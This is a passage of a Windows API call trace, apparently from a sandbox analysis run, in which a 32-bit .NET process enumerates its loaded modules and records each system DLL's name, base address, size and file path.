lpmodinfo=0x269f150*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0142.517] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.517] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0142.518] CoTaskMemFree (pv=0x55b0d0) [0142.518] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.518] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0142.518] CoTaskMemFree (pv=0x55b0d0) [0142.518] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x26a125c, cb=0xc | out: lpmodinfo=0x26a125c*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0142.519] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.519] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0142.520] CoTaskMemFree (pv=0x55b0d0) [0142.520] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.520] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0142.520] CoTaskMemFree (pv=0x55b0d0) [0142.520] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x26a3370, cb=0xc | out: lpmodinfo=0x26a3370*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0142.520] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.520] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0142.521] CoTaskMemFree (pv=0x55b0d0) [0142.521] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.521] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0142.521] CoTaskMemFree (pv=0x55b0d0) [0142.521] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x26a54a4, cb=0xc | out: lpmodinfo=0x26a54a4*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0142.522] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.522] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0142.522] CoTaskMemFree (pv=0x55b0d0) [0142.522] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.522] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0142.522] CoTaskMemFree (pv=0x55b0d0) [0142.522] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x26a75ec, cb=0xc | out: lpmodinfo=0x26a75ec*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0142.523] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.523] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0142.523] CoTaskMemFree (pv=0x55b0d0) [0142.523] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.523] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0142.524] CoTaskMemFree (pv=0x55b0d0) [0142.524] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x26a96f8, cb=0xc | out: lpmodinfo=0x26a96f8*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0142.524] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.524] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0142.525] CoTaskMemFree (pv=0x55b0d0) [0142.525] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.525] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0142.528] CoTaskMemFree (pv=0x55b0d0) [0142.528] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x26ab804, cb=0xc | out: lpmodinfo=0x26ab804*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0142.529] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.529] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0142.529] CoTaskMemFree (pv=0x55b0d0) [0142.529] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.529] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0142.529] CoTaskMemFree (pv=0x55b0d0) [0142.529] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x26ad994, cb=0xc | out: lpmodinfo=0x26ad994*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0142.530] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.530] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0142.530] CoTaskMemFree (pv=0x55b0d0) [0142.530] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.530] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0142.531] CoTaskMemFree (pv=0x55b0d0) [0142.531] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x26afaa0, cb=0xc | out: lpmodinfo=0x26afaa0*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0142.531] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.531] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0142.532] CoTaskMemFree (pv=0x55b0d0) [0142.532] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.532] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0142.532] CoTaskMemFree (pv=0x55b0d0) [0142.532] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x26b1ba4, cb=0xc | out: lpmodinfo=0x26b1ba4*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0142.534] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.534] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0142.534] CoTaskMemFree (pv=0x55b0d0) [0142.534] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.534] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0142.535] CoTaskMemFree (pv=0x55b0d0) [0142.535] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x26b3cd0, cb=0xc | out: lpmodinfo=0x26b3cd0*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0142.535] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.535] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0142.536] CoTaskMemFree (pv=0x55b0d0) [0142.536] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.536] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0142.536] CoTaskMemFree (pv=0x55b0d0) [0142.536] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x26b5ddc, cb=0xc | out: lpmodinfo=0x26b5ddc*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0142.537] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.537] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0142.537] CoTaskMemFree (pv=0x55b0d0) [0142.537] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.537] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0142.538] CoTaskMemFree (pv=0x55b0d0) [0142.538] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x26b7f0c, cb=0xc | out: lpmodinfo=0x26b7f0c*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0142.538] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.539] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0142.539] CoTaskMemFree (pv=0x55b0d0) [0142.539] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.539] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0142.540] CoTaskMemFree (pv=0x55b0d0) [0142.540] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x26ba040, cb=0xc | out: lpmodinfo=0x26ba040*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0142.540] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.540] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0142.545] CoTaskMemFree (pv=0x55b0d0) [0142.545] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.545] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0142.545] CoTaskMemFree (pv=0x55b0d0) [0142.545] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x26bc1e8, cb=0xc | out: lpmodinfo=0x26bc1e8*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0142.546] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.546] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0142.546] CoTaskMemFree (pv=0x55b0d0) [0142.546] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.546] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0142.547] CoTaskMemFree (pv=0x55b0d0) [0142.547] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x26be2ec, cb=0xc | out: lpmodinfo=0x26be2ec*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0142.548] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.548] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0142.548] CoTaskMemFree (pv=0x55b0d0) [0142.548] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.548] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0142.549] CoTaskMemFree (pv=0x55b0d0) [0142.549] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x26c03f8, cb=0xc | out: lpmodinfo=0x26c03f8*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0142.549] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.549] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0142.550] CoTaskMemFree (pv=0x55b0d0) [0142.550] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.550] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0142.551] CoTaskMemFree (pv=0x55b0d0) [0142.551] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x26c2538, cb=0xc | out: lpmodinfo=0x26c2538*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0142.552] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.552] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0142.552] CoTaskMemFree (pv=0x55b0d0) [0142.552] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.553] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0142.553] CoTaskMemFree (pv=0x55b0d0) [0142.553] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x26c464c, cb=0xc | out: lpmodinfo=0x26c464c*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0142.554] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.554] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0142.554] CoTaskMemFree (pv=0x55b0d0) [0142.554] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.554] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0142.555] CoTaskMemFree (pv=0x55b0d0) [0142.555] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x26c67e8, cb=0xc | out: lpmodinfo=0x26c67e8*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0142.556] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.556] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0142.559] CoTaskMemFree (pv=0x55b0d0) [0142.560] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.560] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0142.560] CoTaskMemFree (pv=0x55b0d0) [0142.560] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x26c89b4, cb=0xc | out: lpmodinfo=0x26c89b4*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0142.561] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.561] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0142.561] CoTaskMemFree (pv=0x55b0d0) [0142.562] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.562] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0142.562] CoTaskMemFree (pv=0x55b0d0) [0142.562] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x26caba4, cb=0xc | out: lpmodinfo=0x26caba4*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0142.563] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.563] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.564] CoTaskMemFree (pv=0x55b0d0) [0142.577] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.577] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0142.583] CoTaskMemFree (pv=0x55b0d0) [0142.583] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x22d4140, cb=0xc | out: lpmodinfo=0x22d4140*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0142.584] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.584] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.585] CoTaskMemFree (pv=0x55b0d0) [0142.585] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.585] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0142.586] CoTaskMemFree (pv=0x55b0d0) [0142.586] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x22d640c, cb=0xc | out: lpmodinfo=0x22d640c*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0142.586] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.586] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0142.587] CoTaskMemFree (pv=0x55b0d0) [0142.587] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.587] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0142.591] CoTaskMemFree (pv=0x55b0d0) [0142.591] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x22d8518, cb=0xc | out: lpmodinfo=0x22d8518*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0142.592] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.592] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0142.593] CoTaskMemFree (pv=0x55b0d0) [0142.593] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.593] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0142.594] CoTaskMemFree (pv=0x55b0d0) [0142.594] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x22da6d4, cb=0xc | out: lpmodinfo=0x22da6d4*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0142.595] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.595] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0142.595] CoTaskMemFree (pv=0x55b0d0) [0142.595] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.595] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0142.596] CoTaskMemFree (pv=0x55b0d0) [0142.596] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x22dc8c4, cb=0xc | out: lpmodinfo=0x22dc8c4*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0142.597] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.597] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0142.598] CoTaskMemFree (pv=0x55b0d0) [0142.598] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.598] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0142.599] CoTaskMemFree (pv=0x55b0d0) [0142.599] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x22dea78, cb=0xc | out: lpmodinfo=0x22dea78*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0142.600] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.600] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0142.600] CoTaskMemFree (pv=0x55b0d0) [0142.600] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.600] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0142.601] CoTaskMemFree (pv=0x55b0d0) [0142.601] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x22e0b7c, cb=0xc | out: lpmodinfo=0x22e0b7c*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0142.602] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.602] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0142.603] CoTaskMemFree (pv=0x55b0d0) [0142.603] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0142.603] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0142.606] CoTaskMemFree (pv=0x55b0d0) [0142.607] GetModuleInformation (in: hProcess=0x2a0, 